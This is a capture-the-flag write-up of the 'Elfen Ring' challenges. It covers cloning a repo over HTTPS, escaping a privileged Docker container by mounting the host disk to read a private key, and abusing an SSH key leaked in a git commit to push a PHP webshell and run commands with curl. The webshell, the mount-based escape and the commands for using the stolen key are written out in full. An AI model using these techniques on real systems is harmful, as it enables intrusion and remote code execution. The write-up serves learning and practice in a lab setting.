Elfen Ring

The Elfen ring path is one that will take us into the CI/CD world and the problematic of it

Clone with a Different Tool

On this challenge we are tasked to clone a public repo and provide the last word of the README.md file. Besides this, we are provided with git clone [email protected]:asnowball/aws_scripts.git which does not work. The goal here is to change the protocol used (ssh) to use https and find the correct endpoint that contains the repo. For this we can use the below Google search: haugfactory.com inurl:aws_scripts

Google Search

Now we just need to do a clone of this repo via HTTPS: git clone http://haugfactory.com/orcadmin/aws_scripts.git Now that we have the correct repo we just need to do cat of the README.md file and provide the last word as input to the binary runtoanswer to complete the challenge.

Answer

runtoanswer maintainers

Prison Escape

For the second challenge we are asked to escape a container and provide the hex string stored on /home/jailer/.ssh/jail.key.priv. Also this task takes us to a second room

Elfen Ring 2nd room

At the beginning this challenge might look really complicated however it is not so much. First things first, let's check what permission do we have on the box and for that we will run sudo -l

sudo -l

So we know that we can impersonate root and for that we run sudo su -

Now we can start enumerating the container and for that we will be using deepce. Because we do not have internet access we will just copy and paste the shell script over and run it like below: chmod +x ./deepce.sh ./deepce.sh > output.txt

Because the ouput of the tool has many blank lines we will be using sed to remove all empty lines: sed -r '/^\s*$/d' output.txt > output2.txt

To better parse the output my personal preference is to use cat and more like this cat output2.txt | more. From it we can see the docker being run in privileged mode. This grants the Docker container root capabilities to all devices on the host system.

Docker running on Privileged Mode

Now the next step is to list all disks available within the docker and for that we run fdisk -l

fdisk -l

We can see that we have a disk on /dev/vda. Now is time to try and mount this disk from within the docker and for that we run mount /dev/vda /tmp/test and validate the results by running ls /tmp/test

ls /tmp/test

So we can see that we successfully mounted the host disk from inside the docker. The last step is to capture what we are looking for (/home/jailer/.ssh/jail.key.priv). For this we just need to do cat /tmp/test/home/jailer/.ssh/jail.key.priv

Answer

082bb339ec19de4935867

Jolly CI/CD

After solving the prison escape we can jump into the Jolly CI/CD, also with this a new hint is unlocked from Tinsel.

New hint from Tinsel

This hint is super valuable because it will guide us on this challenge. Let's keep in mind the capital letters (WHOOPS!) and the GitLab location.

Like on the previous challenge we reviewed the local permissions and run deepce.sh. After reviewing the output this part was quite interesting

Docker network

The next question is, can we clone this repo? Let's give it a try with git clone http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git

git clone

Now that we were able to clone the repository we can look for the WHOOPS! commit and see what it contains. For that we will run git log (show us the different commits)

git log

On this case we are interested on the commit e19f653bde9ea3de6af21a587e41e7a909db1ca5. We can access the contents by doing git show e19f653bde9ea3de6af21a587e41e7a909db1ca5

git show e19f653bde9ea3de6af21a587e41e7a909db1ca5

We can see an openssh key that was commited. One thing we need to keep in mind is that RSA openssh keys are not only used to authenticate into systems but also for example github/gitlab. (This took me long time to understand)

Now the next step is to add it to the ssh-agent. For that we run the below: eval "$(ssh-agent -s)" ssh-add id_rsa

ssh-add id_rsa

Now that we have added the ssh key the next step is to remove the old directory and clone it again with the new creds. For that we will be running the following git clone: git clone [email protected]:rings-of-powder/wordpress.flag.net.internal.git

git clone [email protected]:rings-of-powder/wordpress.flag.net.internal.git

We know this is an wordpress running php.

php wordpress

Now that we could download the repo via the ssh key we might be able also to apply changes and achieve code execution. For that we will be creating a webshell (we could create a reverse shell as well but running a webshell and manipulating via curl seems more interesting)

For this we will be creating a file called shell.php where the contents will be:

<?php system($_GET['cmd']); ?>

Now we just need to config the github, add the shell.php file and proceed with the commit.

Upload of the webshell

After all of this we need to push our changes via git push and validate the results

Command execution

Because our commands will have spaces we need to encode it in order to be accepted. For example ls / will be represented by ls%20%2F. By running ls / we found that the flag is on the root directory. The only thing remaining is to grab the flag via curl wordpress.flag.net.internal/shell.php?cmd=cat%20%2Fflag.txt

ls / + cat /flag.txt
Answer

oI40zIuCcN8c3MhKgQjOMN8lfYtVqcKT

PreviousTolkien RingNextWeb Ring

Last updated